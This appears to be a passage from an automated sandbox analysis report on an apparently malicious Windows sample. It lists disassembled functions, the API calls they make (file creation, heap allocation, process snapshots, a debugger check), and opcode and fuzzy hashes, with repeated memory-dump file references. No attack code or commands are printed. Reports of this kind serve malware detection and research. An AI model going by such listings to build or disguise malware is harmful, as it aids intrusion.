API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: 2b692a226f098f313aa36f144704bf75e1059a997f9129fb32c0d101e7d4d2e9
Instruction ID: ddba0ec18207e15d9db37161bb85ec53580b1df550de03647a499432c29fc012
Opcode Fuzzy Hash: 2b692a226f098f313aa36f144704bf75e1059a997f9129fb32c0d101e7d4d2e9
Instruction Fuzzy Hash: CD21BB71A042989BCF41DFD4C849BEE7BFCAF49304F10405AE504A7281DBF45A89EF91

Function 00C6D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658b1f49f8c6ddb9293a51b4b034d294e4ec7c676eab0366c277f70fb81f5486
Instruction ID: c031bfc3d53f7d9e5388e39d7640ae41c7b111af0d2b7c56b648c746e8e652e3
Opcode Fuzzy Hash: 658b1f49f8c6ddb9293a51b4b034d294e4ec7c676eab0366c277f70fb81f5486
Instruction Fuzzy Hash: 2EF13974A083059FC724DF28C484A6ABBE5FF88314F14896DF99A9B351DB30E945CF92

Function 00C01680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C016DB
_memmove.LIBCMT ref: 00C0174C
_memmove.LIBCMT ref: 00C017B9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 003d7674410201e34be729941cf28329c88c8dea4cc0a41719e2c13322a33b11
Instruction ID: 9642c83f52ebcdd247163e7c180a0d97bdf15f041d55b47f0aed30e54be3a67e
Opcode Fuzzy Hash: 003d7674410201e34be729941cf28329c88c8dea4cc0a41719e2c13322a33b11
Instruction Fuzzy Hash: 8F61BF71A00209EBDF04CF29D9816AEBBB4FF44310F198569EC19CF295EB31DAA0DB51

Function 00BFAC2A Relevance: 4.6, APIs: 3, Instructions: 90comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C0FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C74186,00000001,00C80980), ref: 00C0FFA7

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BFAD08
OleInitialize.OLE32(00000000), ref: 00BFAD85
CloseHandle.KERNEL32(00000000), ref: 00C32F56

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 9d78a232ad03dd5961c7f574e047eb839c5d129e1271e3353d32b2d576ea381a
Instruction ID: 25e1b466686ba62374d10bd775022f0c9e802e2543491fb8532be09f12536cdf
Opcode Fuzzy Hash: 9d78a232ad03dd5961c7f574e047eb839c5d129e1271e3353d32b2d576ea381a
Instruction Fuzzy Hash: F541F2B09082408EC756EF69AC5476D7FE8EBD9311F10876AEC28E72B1EB304849DF55

Function 00C059D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C059F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C05A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C05ABB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: e8f67568975cc80c8a5c04c2dd06c943ff7b9ff836baa55a9162d565fa9dfe0b
Instruction ID: d39704daca1322a9e1fa754b61553adf19d97cb4f11b0c2c056390b55979b66a
Opcode Fuzzy Hash: e8f67568975cc80c8a5c04c2dd06c943ff7b9ff836baa55a9162d565fa9dfe0b
Instruction Fuzzy Hash: A43182B0605701DFD720DF34D8847ABBBE4FB89304F000A2EFA9A86291D7716A44DF52

Function 00C1593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00C15953

Part of subcall function 00C1A39B: __NMSG_WRITE.LIBCMT ref: 00C1A3C2
Part of subcall function 00C1A39B: __NMSG_WRITE.LIBCMT ref: 00C1A3CC

__NMSG_WRITE.LIBCMT ref: 00C1595A

Part of subcall function 00C1A3F8: GetModuleFileNameW.KERNEL32(00000000,00CB53BA,00000104,00000004,00000001,00C11003), ref: 00C1A48A
Part of subcall function 00C1A3F8: ___crtMessageBoxW.LIBCMT ref: 00C1A538

Part of subcall function 00C132CF: ___crtCorExitProcess.LIBCMT ref: 00C132D5
Part of subcall function 00C132CF: ExitProcess.KERNEL32 ref: 00C132DE

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

RtlAllocateHeap.NTDLL(01440000,00000000,00000001,?,00000004,?,?,00C11003,?), ref: 00C1597F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 25a37140ede84aff78a82a9955b605b1dba2aaf895991893c75ba9903d5af54c
Instruction ID: 97c74827ca06fdf9c445640f5c200cf75df35a3faf3eddaf642adefea611f9f2
Opcode Fuzzy Hash: 25a37140ede84aff78a82a9955b605b1dba2aaf895991893c75ba9903d5af54c
Instruction Fuzzy Hash: EC01F535206B12DAE6113725AC02BEE32588FC3770F500126F4249A2E1DEB08EC27B63

Function 00C592C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C592D6

Part of subcall function 00C12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19C54,00000000,00C18D5D,00C159C3), ref: 00C12F99
Part of subcall function 00C12F85: GetLastError.KERNEL32(00000000,?,00C19C54,00000000,00C18D5D,00C159C3), ref: 00C12FAB

_free.LIBCMT ref: 00C592E7
_free.LIBCMT ref: 00C592F9

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: 13b30d1117cae948d18fdf06b19f8bab0a449f61556c269dd409830bfae9de29
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 6EE0C2A520871293CA20A5B87C44ED377ECCF88312F14044DB819D3146CE30E8E2A02C

Function 00BF5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00C2E234

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 3819a54aeaf82f5d9f7c4a7f27a12fe39f95ac859f5ebaa372c6fb0bd6fc2b6c
Instruction ID: 725a52cb1acb051d35d742aa12f38f30bf651e066f8b0afd49348aeeb0796bf1
Opcode Fuzzy Hash: 3819a54aeaf82f5d9f7c4a7f27a12fe39f95ac859f5ebaa372c6fb0bd6fc2b6c
Instruction Fuzzy Hash: E9326974508315DFCB24DF14C490A6AB7E1FF85304F1489ADEA8A9B362D731ED89DB82

Function 00C048B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C048FA

Strings

EA06, xrefs: 00C408A1

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: cd437ab497dc365c46be2a184381f565d38cf530bc91b97ae3ad925bf5e04536
Instruction ID: 57db30c47e2f43d974f38ec13c9fe483100bf5f31282c6a6672d4400b34135fe
Opcode Fuzzy Hash: cd437ab497dc365c46be2a184381f565d38cf530bc91b97ae3ad925bf5e04536
Instruction Fuzzy Hash: 96418DA1E041585BDF299B6489517BF7FAD9B45310F284075EF82EB2C7C6318E84E3E1

Function 00C6E139 Relevance: 3.2, APIs: 2, Instructions: 227COMMON

Download Yara Rule

APIs

_strcat.LIBCMT ref: 00C6E20C

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

_wcscpy.LIBCMT ref: 00C6E29B

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __itow__swprintf_strcat_wcscpy
String ID:
API String ID: 1012013722-0
Opcode ID: 010ba038c4978a2098f3964fb36863e95b9233859e89db72c2e10c62a42371fd
Instruction ID: 00c53214c0a16ebd3af081303e515e64179780efef3378c988f69a8d5c531eb7
Opcode Fuzzy Hash: 010ba038c4978a2098f3964fb36863e95b9233859e89db72c2e10c62a42371fd
Instruction Fuzzy Hash: 00913A39A00504DFCB28DF28C5D19ADB7E5FF59310B5580AAE91A8F362DB30EE55CB81

Function 00C56135 Relevance: 3.1, APIs: 2, Instructions: 142COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00C5614E

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 9be4860e5f74b95c5ec8baa3002c1b48ed1021d395560eec7314959fed656db3
Instruction ID: ca90319dfad1d80d11cae39d713ade93df9a94f8f49676f5d1c7ae41ff24caad
Opcode Fuzzy Hash: 9be4860e5f74b95c5ec8baa3002c1b48ed1021d395560eec7314959fed656db3
Instruction Fuzzy Hash: BC41E5BA6002099FCB11DFA4CC818BFB3B8EB44351F54452EED1687291EB70DE89DB50

Function 00C10E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00C10ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00C10EE7

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 7adbbaed3eb7fda2df247689423093e0a2be5f1b17957d2e495c26c6b0f3b426
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4431C971A00109DFD718DF5AC4809A9F7A6FF5A300B748AA5E459CB251E771EEC1EBC0

Function 00C05F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00C05FEF

Part of subcall function 00C1359C: __lock.LIBCMT ref: 00C135A2
Part of subcall function 00C1359C: DecodePointer.KERNEL32(00000001,?,00C06004,00C48892), ref: 00C135AE
Part of subcall function 00C1359C: EncodePointer.KERNEL32(?,?,00C06004,00C48892), ref: 00C135B9

Part of subcall function 00C05F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C05F18
Part of subcall function 00C05F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C05F2D

Part of subcall function 00C05240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C0526C
Part of subcall function 00C05240: IsDebuggerPresent.KERNEL32 ref: 00C0527E
Part of subcall function 00C05240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00C052E6
Part of subcall function 00C05240: SetCurrentDirectoryW.KERNEL32(?), ref: 00C05366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C0602F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 2ae41a475bba718006d268e22c376622f998d92ed43ad58837912a692065c8f2
Instruction ID: bffd09d69501cbd6dc38887b36cb0c6cb1ea1455a73a9a572b6eee679531baa2
Opcode Fuzzy Hash: 2ae41a475bba718006d268e22c376622f998d92ed43ad58837912a692065c8f2
Instruction Fuzzy Hash: 331189718083069BC710EF69EC49B5FBBE8EF98710F004A1AF554872A1DB709948CF96

Function 00C042F9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C03E72,?,?,?,00000000), ref: 00C04327
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,00000000,?,?,00C03E72,?,?,?,00000000), ref: 00C40717

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7ee772414b31005a743f614a26c1e74c8876f8c10d060b96ab9604070933def6
Instruction ID: f990887701aca4f7dbbd7b1d721a37d99fca8503720552d8a40ee00238791c88
Opcode Fuzzy Hash: 7ee772414b31005a743f614a26c1e74c8876f8c10d060b96ab9604070933def6
Instruction Fuzzy Hash: 9F0156B0184309BEF3641E14CC8AF677A9CEB05769F10C319FBE56A1E0C6B55D45DB14

Function 00C10FE6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C1593C: __FF_MSGBANNER.LIBCMT ref: 00C15953
Part of subcall function 00C1593C: __NMSG_WRITE.LIBCMT ref: 00C1595A
Part of subcall function 00C1593C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,?,00000004,?,?,00C11003,?), ref: 00C1597F

std::exception::exception.LIBCMT ref: 00C1101C
__CxxThrowException@8.LIBCMT ref: 00C11031

Part of subcall function 00C187CB: RaiseException.KERNEL32(?,?,?,00CACAF8,?,?,?,?,?,00C11036,?,00CACAF8,?,00000001), ref: 00C18820

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 27d59ec7a946569a285ccadad280ce22e2514f6918b9a79f0aad1732303affbf
Instruction ID: 9dbb684ca93da34f7a193926715f5c5cf34ed8452f292f483353e30182e8c9a9
Opcode Fuzzy Hash: 27d59ec7a946569a285ccadad280ce22e2514f6918b9a79f0aad1732303affbf
Instruction Fuzzy Hash: 83F0287160824DA6CB20BE98EC029EE77AC9F03714F200066FD1492181EFB18FC5F2E4

Function 00C1581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C1584C
__lock_file.LIBCMT ref: 00C1586D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f2f53c2622a46c764b680996afb7e2109e2a84ecf0150f73100da9b832e55e0a
Instruction ID: 62bec0399077eeaf0b6a33722fd660db237ced1ef16fb16cf95f5440f9d41e2e
Opcode Fuzzy Hash: f2f53c2622a46c764b680996afb7e2109e2a84ecf0150f73100da9b832e55e0a
Instruction Fuzzy Hash: FE017171844749EBDF11AF6A8C018DE7B61AFC2360F148115B8241A1E1D7318A92FB91

Function 00C155C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

__lock_file.LIBCMT ref: 00C1560B

Part of subcall function 00C16E3E: __lock.LIBCMT ref: 00C16E61

__fclose_nolock.LIBCMT ref: 00C15616

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 06b3c2211872a499716e31def29b0d9cb71f4770434f449d0220739c6aa3b80c
Instruction ID: a2286545a85da3516a84e5ec7ed3ea5b5274466ea81a6c27d13bdc62480eaf69
Opcode Fuzzy Hash: 06b3c2211872a499716e31def29b0d9cb71f4770434f449d0220739c6aa3b80c
Instruction Fuzzy Hash: 9AF09071805B05DBD7106B7588027EE77A26F83334F11824AB428AB1C1CBBC8AC1BB51

Function 00BFE36D Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00BFE385
Sleep.KERNEL32(00000000), ref: 00BFE3BE

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: dfde6c57fc75d8a073d7d8dd97a62b2840e1e95855b5f0b4b13c5dafe2c21f24
Instruction ID: 09d74a120fe1f41da684df78b77b254eb099ff70796503406d67eab7dfbfa8ce
Opcode Fuzzy Hash: dfde6c57fc75d8a073d7d8dd97a62b2840e1e95855b5f0b4b13c5dafe2c21f24
Instruction Fuzzy Hash: EAF082302406099FD3A0EB78D459F7AB7E4EF45360F100069E62AC7361DF70AC08CB95

Function 00C15E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00C15EB4
__ftell_nolock.LIBCMT ref: 00C15EBF

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
